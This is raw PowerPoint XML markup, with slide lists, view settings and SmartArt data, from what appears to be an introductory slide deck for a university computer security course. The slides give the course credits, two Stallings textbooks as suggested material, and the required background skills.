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2" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId49"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId50"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="285" r:id="rId2"/>
    <p:sldId id="286" r:id="rId3"/>
    <p:sldId id="290" r:id="rId4"/>
    <p:sldId id="287" r:id="rId5"/>
    <p:sldId id="288" r:id="rId6"/>
    <p:sldId id="296" r:id="rId7"/>
    <p:sldId id="310" r:id="rId8"/>
    <p:sldId id="311" r:id="rId9"/>
    <p:sldId id="315" r:id="rId10"/>
    <p:sldId id="307" r:id="rId11"/>
    <p:sldId id="289" r:id="rId12"/>
    <p:sldId id="308" r:id="rId13"/>
    <p:sldId id="317" r:id="rId14"/>
    <p:sldId id="281" r:id="rId15"/>
    <p:sldId id="316" r:id="rId16"/>
    <p:sldId id="318" r:id="rId17"/>
    <p:sldId id="309" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="297" r:id="rId20"/>
    <p:sldId id="298" r:id="rId21"/>
    <p:sldId id="305" r:id="rId22"/>
    <p:sldId id="306" r:id="rId23"/>
    <p:sldId id="320" r:id="rId24"/>
    <p:sldId id="319" r:id="rId25"/>
    <p:sldId id="301" r:id="rId26"/>
    <p:sldId id="302" r:id="rId27"/>
    <p:sldId id="303" r:id="rId28"/>
    <p:sldId id="304" r:id="rId29"/>
    <p:sldId id="294" r:id="rId30"/>
    <p:sldId id="292" r:id="rId31"/>
    <p:sldId id="293" r:id="rId32"/>
    <p:sldId id="256" r:id="rId33"/>
    <p:sldId id="278" r:id="rId34"/>
    <p:sldId id="279" r:id="rId35"/>
    <p:sldId id="257" r:id="rId36"/>
    <p:sldId id="280" r:id="rId37"/>
    <p:sldId id="282" r:id="rId38"/>
    <p:sldId id="283" r:id="rId39"/>
    <p:sldId id="266" r:id="rId40"/>
    <p:sldId id="265" r:id="rId41"/>
    <p:sldId id="271" r:id="rId42"/>
    <p:sldId id="273" r:id="rId43"/>
    <p:sldId id="274" r:id="rId44"/>
    <p:sldId id="314" r:id="rId45"/>
    <p:sldId id="299" r:id="rId46"/>
    <p:sldId id="313" r:id="rId47"/>
    <p:sldId id="312" r:id="rId48"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>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5" autoAdjust="0"/>
    <p:restoredTop sz="75603" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="94" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="3398" y="8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979EE-A343-4B28-9FC0-57AE1CD8E1F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FF30B46-515B-48AF-B942-4E756253D3E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT" b="1" i="1"/>
            <a:t>6 ECTS (4 Theory + 2 Lab = 32+24 hours)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89293BEF-A119-4B1C-B5F3-2B72D4F1F00A}" type="parTrans" cxnId="{84959940-1729-4345-80D5-13969B6C4F3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32C1FA17-C09B-4E81-AA3B-328FBFA4D235}" type="sibTrans" cxnId="{84959940-1729-4345-80D5-13969B6C4F3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT" b="1" i="1"/>
            <a:t>Suggested material:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8949B12-875F-4A88-9D73-777FC3B0BBA4}" type="parTrans" cxnId="{FB6C92EE-2D17-4E77-8269-5E6FF9500B80}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{67085C1A-B2E6-47A7-814A-1202EA121D3F}" type="sibTrans" cxnId="{FB6C92EE-2D17-4E77-8269-5E6FF9500B80}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1717A87-9D30-47B9-9EFB-701D0BEC2243}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>W. Stallings, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" i="1" dirty="0"/>
            <a:t>Cryptography and Network Security (7</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" i="1" baseline="30000" dirty="0"/>
            <a:t>th</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" i="1" dirty="0"/>
            <a:t>-8</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" i="1" baseline="30000" dirty="0"/>
            <a:t>th</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" i="1" dirty="0"/>
            <a:t> edition)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92DF112A-8B52-45C2-892C-DCAE83C9DFFE}" type="parTrans" cxnId="{26E4385B-015F-4D73-9595-6C9DA1782309}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A12E4F6-8A80-488A-A329-9B2F30ADDA2C}" type="sibTrans" cxnId="{26E4385B-015F-4D73-9595-6C9DA1782309}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CE8535F-21A7-4813-AFAD-D64554955BA9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>W. Stallings, Computer Security: Principles and Practice (4</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" baseline="30000" dirty="0"/>
            <a:t>th</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> edition)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4243B3D0-3201-4FB7-84CC-5F2BB003263F}" type="parTrans" cxnId="{9D6B24BB-A544-4AA9-A4E0-223F2022F315}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2D3AAD7-3465-437F-985E-B2EB08620481}" type="sibTrans" cxnId="{9D6B24BB-A544-4AA9-A4E0-223F2022F315}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC473A60-ACC2-4A05-B52C-0F05B9AE441D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT" b="1"/>
            <a:t>Online material</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C918DAA-23B4-4DEA-8AF6-3519D545912D}" type="parTrans" cxnId="{1AC27C25-A31B-43CB-A960-87056EB6BA4A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F4FD00D-5A82-44CD-A476-311A3B867B8F}" type="sibTrans" cxnId="{1AC27C25-A31B-43CB-A960-87056EB6BA4A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F56AA158-3E2C-4C85-8867-5492A70DD392}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" i="1"/>
            <a:t>Required skills:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3BBC5F99-80B9-4514-8A84-AAF48881AAB8}" type="parTrans" cxnId="{811B3E76-7DBE-4B16-8698-34E924A0DCEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3021511-603A-4819-9C98-BF54B3B74AB7}" type="sibTrans" cxnId="{811B3E76-7DBE-4B16-8698-34E924A0DCEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{803F5FE8-2F39-49D9-AD62-C4FFED516A44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" i="1"/>
            <a:t>Operating Systems, Computer Networks, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Databases, Web Information Systems, Scripting and programming</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25FA10D5-2583-4FCC-A0F4-7CF90C20201F}" type="parTrans" cxnId="{3A081638-FCA3-43B4-822E-046386A70401}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{76C6D0FF-5553-420C-9E00-CA29EE06DE7B}" type="sibTrans" cxnId="{3A081638-FCA3-43B4-822E-046386A70401}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{598361B5-22A9-4EE1-86CD-8E092B795D45}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" i="1"/>
            <a:t>In other words, a bachelor degree in Computer Science</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B3B2086-6C80-4236-9FE6-68630D431FDE}" type="parTrans" cxnId="{F80C3358-3BEF-4E9E-B187-6A52A48AD590}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B30596E2-982A-4E26-94E0-DC31F65E6A24}" type="sibTrans" cxnId="{F80C3358-3BEF-4E9E-B187-6A52A48AD590}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F9AE281-FFF0-49B7-9352-188252AFB682}" type="pres">
      <dgm:prSet presAssocID="{F94979EE-A343-4B28-9FC0-57AE1CD8E1FE}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{15FED3EC-AC05-4BBE-A8F6-07A5C851C323}" type="pres">
      <dgm:prSet presAssocID="{4FF30B46-515B-48AF-B942-4E756253D3E8}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8CB3357-4DD5-432B-AFE5-E9CFAE20C757}" type="pres">
      <dgm:prSet presAssocID="{4FF30B46-515B-48AF-B942-4E756253D3E8}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DEC76A6E-EC80-49E1-B265-460D9CEFB9FD}" type="pres">
      <dgm:prSet presAssocID="{4FF30B46-515B-48AF-B942-4E756253D3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97A939D3-FB5E-49AC-8E75-58802285A0BC}" type="pres">
      <dgm:prSet presAssocID="{4FF30B46-515B-48AF-B942-4E756253D3E8}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1641667-BE28-497A-9A60-8A1554B8BB86}" type="pres">
      <dgm:prSet presAssocID="{4FF30B46-515B-48AF-B942-4E756253D3E8}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{34F723A0-C348-429D-89E0-EF9A48F5195C}" type="pres">
      <dgm:prSet presAssocID="{32C1FA17-C09B-4E81-AA3B-328FBFA4D235}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1979F044-F777-4414-8F34-4D1DBC72404A}" type="pres">
      <dgm:prSet presAssocID="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6EF8AC5E-7A08-4908-A2FE-B4D29172D176}" type="pres">
      <dgm:prSet presAssocID="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{772DADB7-7183-4CE8-9F20-478A95274F71}" type="pres">
      <dgm:prSet presAssocID="{F2449B53-AD7F-4E6E-B6BD-85BC83E839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8212367-2575-43A4-9B66-F14CA8979AB2}" type="pres">
      <dgm:prSet presAssocID="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B1ABD863-BDA8-4727-827E-4763CB223EE9}" type="pres">
      <dgm:prSet presAssocID="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25D5AD08-2CD2-477E-AA2C-B8C91FF3F437}" type="pres">
      <dgm:prSet presAssocID="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" presName="desTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{623BEDAB-0EE8-4D07-9A70-B72DF6793024}" type="pres">
      <dgm:prSet presAssocID="{67085C1A-B2E6-47A7-814A-1202EA121D3F}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E9CCC69B-F84B-4B99-8466-909E33F65FFB}" type="pres">
      <dgm:prSet presAssocID="{F56AA158-3E2C-4C85-8867-5492A70DD392}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{36432EF6-D733-4859-9E04-F30EA3B51EF1}" type="pres">
      <dgm:prSet presAssocID="{F56AA158-3E2C-4C85-8867-5492A70DD392}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{880A38CD-77D5-4AA1-8893-9A14B962DB35}" type="pres">
      <dgm:prSet presAssocID="{F56AA158-3E2C-4C85-8867-5492A70DD3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C567CC2-AFA0-4321-9A29-DD8F3F0F2143}" type="pres">
      <dgm:prSet presAssocID="{F56AA158-3E2C-4C85-8867-5492A70DD392}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3DBB033C-13AE-4A9E-88B8-8532276F612E}" type="pres">
      <dgm:prSet presAssocID="{F56AA158-3E2C-4C85-8867-5492A70DD392}" presName="parTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A7AD606D-6CD9-4A31-B46D-40A2404DA3C3}" type="pres">
      <dgm:prSet presAssocID="{F56AA158-3E2C-4C85-8867-5492A70DD392}" presName="desTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B9952205-CC9D-4A59-8C20-64D33E4D2C5E}" type="presOf" srcId="{FC473A60-ACC2-4A05-B52C-0F05B9AE441D}" destId="{25D5AD08-2CD2-477E-AA2C-B8C91FF3F437}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E273F224-528C-49D9-A489-3611082A044B}" type="presOf" srcId="{F94979EE-A343-4B28-9FC0-57AE1CD8E1FE}" destId="{4F9AE281-FFF0-49B7-9352-188252AFB682}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1AC27C25-A31B-43CB-A960-87056EB6BA4A}" srcId="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" destId="{FC473A60-ACC2-4A05-B52C-0F05B9AE441D}" srcOrd="2" destOrd="0" parTransId="{0C918DAA-23B4-4DEA-8AF6-3519D545912D}" sibTransId="{3F4FD00D-5A82-44CD-A476-311A3B867B8F}"/>
    <dgm:cxn modelId="{131EB926-17F2-481B-80FD-3667501C30D2}" type="presOf" srcId="{803F5FE8-2F39-49D9-AD62-C4FFED516A44}" destId="{A7AD606D-6CD9-4A31-B46D-40A2404DA3C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3A081638-FCA3-43B4-822E-046386A70401}" srcId="{F56AA158-3E2C-4C85-8867-5492A70DD392}" destId="{803F5FE8-2F39-49D9-AD62-C4FFED516A44}" srcOrd="0" destOrd="0" parTransId="{25FA10D5-2583-4FCC-A0F4-7CF90C20201F}" sibTransId="{76C6D0FF-5553-420C-9E00-CA29EE06DE7B}"/>
    <dgm:cxn modelId="{84959940-1729-4345-80D5-13969B6C4F3F}" srcId="{F94979EE-A343-4B28-9FC0-57AE1CD8E1FE}" destId="{4FF30B46-515B-48AF-B942-4E756253D3E8}" srcOrd="0" destOrd="0" parTransId="{89293BEF-A119-4B1C-B5F3-2B72D4F1F00A}" sibTransId="{32C1FA17-C09B-4E81-AA3B-328FBFA4D235}"/>
    <dgm:cxn modelId="{26E4385B-015F-4D73-9595-6C9DA1782309}" srcId="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" destId="{B1717A87-9D30-47B9-9EFB-701D0BEC2243}" srcOrd="0" destOrd="0" parTransId="{92DF112A-8B52-45C2-892C-DCAE83C9DFFE}" sibTransId="{0A12E4F6-8A80-488A-A329-9B2F30ADDA2C}"/>
    <dgm:cxn modelId="{811B3E76-7DBE-4B16-8698-34E924A0DCEC}" srcId="{F94979EE-A343-4B28-9FC0-57AE1CD8E1FE}" destId="{F56AA158-3E2C-4C85-8867-5492A70DD392}" srcOrd="2" destOrd="0" parTransId="{3BBC5F99-80B9-4514-8A84-AAF48881AAB8}" sibTransId="{B3021511-603A-4819-9C98-BF54B3B74AB7}"/>
    <dgm:cxn modelId="{F80C3358-3BEF-4E9E-B187-6A52A48AD590}" srcId="{F56AA158-3E2C-4C85-8867-5492A70DD392}" destId="{598361B5-22A9-4EE1-86CD-8E092B795D45}" srcOrd="1" destOrd="0" parTransId="{3B3B2086-6C80-4236-9FE6-68630D431FDE}" sibTransId="{B30596E2-982A-4E26-94E0-DC31F65E6A24}"/>
    <dgm:cxn modelId="{62BBA687-DD47-43AF-A24E-9FEEF09FD16B}" type="presOf" srcId="{6CE8535F-21A7-4813-AFAD-D64554955BA9}" destId="{25D5AD08-2CD2-477E-AA2C-B8C91FF3F437}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8E0BE791-768D-4E48-8070-1685133FAD03}" type="presOf" srcId="{598361B5-22A9-4EE1-86CD-8E092B795D45}" destId="{A7AD606D-6CD9-4A31-B46D-40A2404DA3C3}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9D6B24BB-A544-4AA9-A4E0-223F2022F315}" srcId="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" destId="{6CE8535F-21A7-4813-AFAD-D64554955BA9}" srcOrd="1" destOrd="0" parTransId="{4243B3D0-3201-4FB7-84CC-5F2BB003263F}" sibTransId="{C2D3AAD7-3465-437F-985E-B2EB08620481}"/>
    <dgm:cxn modelId="{7B357AE2-A1FF-4FD9-8BAF-D9E01C0514C7}" type="presOf" srcId="{F56AA158-3E2C-4C85-8867-5492A70DD392}" destId="{3DBB033C-13AE-4A9E-88B8-8532276F612E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2D0D10E3-DFB5-43D8-AE75-83566067E7B3}" type="presOf" srcId="{4FF30B46-515B-48AF-B942-4E756253D3E8}" destId="{E1641667-BE28-497A-9A60-8A1554B8BB86}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9D58DCE5-8213-46D8-B842-5EDF11917DDD}" type="presOf" srcId="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" destId="{B1ABD863-BDA8-4727-827E-4763CB223EE9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FB6C92EE-2D17-4E77-8269-5E6FF9500B80}" srcId="{F94979EE-A343-4B28-9FC0-57AE1CD8E1FE}" destId="{F2449B53-AD7F-4E6E-B6BD-85BC83E83944}" srcOrd="1" destOrd="0" parTransId="{E8949B12-875F-4A88-9D73-777FC3B0BBA4}" sibTransId="{67085C1A-B2E6-47A7-814A-1202EA121D3F}"/>
    <dgm:cxn modelId="{B25F34EF-4A1C-4D58-8E70-C6E3E8C2B58B}" type="presOf" srcId="{B1717A87-9D30-47B9-9EFB-701D0BEC2243}" destId="{25D5AD08-2CD2-477E-AA2C-B8C91FF3F437}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5BD0ADAF-1BE7-4BE6-9A1C-20592A2409DF}" type="presParOf" srcId="{4F9AE281-FFF0-49B7-9352-188252AFB682}" destId="{15FED3EC-AC05-4BBE-A8F6-07A5C851C323}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{01EA2301-93D2-46D7-8B75-8881B7354D7A}" type="presParOf" srcId="{15FED3EC-AC05-4BBE-A8F6-07A5C851C323}" destId="{A8CB3357-4DD5-432B-AFE5-E9CFAE20C757}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C32DAF73-74CA-4436-A4B6-23D8554020BA}" type="presParOf" srcId="{15FED3EC-AC05-4BBE-A8F6-07A5C851C323}" destId="{DEC76A6E-EC80-49E1-B265-460D9CEFB9FD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2F186BAD-06DD-4A86-94AB-C20A72CB44FA}" type="presParOf" srcId="{15FED3EC-AC05-4BBE-A8F6-07A5C851C323}" destId="{97A939D3-FB5E-49AC-8E75-58802285A0BC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{621D2072-ED00-4B8F-8CD6-2CA098E01745}" type="presParOf" srcId="{15FED3EC-AC05-4BBE-A8F6-07A5C851C323}" destId="{E1641667-BE28-497A-9A60-8A1554B8BB86}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{017BE6FA-B54B-41F7-B939-D90C8A6C852E}" type="presParOf" srcId="{4F9AE281-FFF0-49B7-9352-188252AFB682}" destId="{34F723A0-C348-429D-89E0-EF9A48F5195C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9F7D96B0-0603-462D-9853-1288D0F347B9}" type="presParOf" srcId="{4F9AE281-FFF0-49B7-9352-188252AFB682}" destId="{1979F044-F777-4414-8F34-4D1DBC72404A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B72A88CB-5B94-475E-9439-D83008FA65EA}" type="presParOf" srcId="{1979F044-F777-4414-8F34-4D1DBC72404A}" destId="{6EF8AC5E-7A08-4908-A2FE-B4D29172D176}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F1A5EE9D-880B-4DB9-9FF3-12A3289CEA3C}" type="presParOf" srcId="{1979F044-F777-4414-8F34-4D1DBC72404A}" destId="{772DADB7-7183-4CE8-9F20-478A95274F71}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2F163FBC-D4FA-4818-BF6C-22AA6153DCC1}" type="presParOf" srcId="{1979F044-F777-4414-8F34-4D1DBC72404A}" destId="{28212367-2575-43A4-9B66-F14CA8979AB2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{22562EE7-88AE-4F76-A379-A69B8D6FDDAF}" type="presParOf" srcId="{1979F044-F777-4414-8F34-4D1DBC72404A}" destId="{B1ABD863-BDA8-4727-827E-4763CB223EE9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D4EAE021-F161-444B-817A-F7AA37137D4A}" type="presParOf" srcId="{1979F044-F777-4414-8F34-4D1DBC72404A}" destId="{25D5AD08-2CD2-477E-AA2C-B8C91FF3F437}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
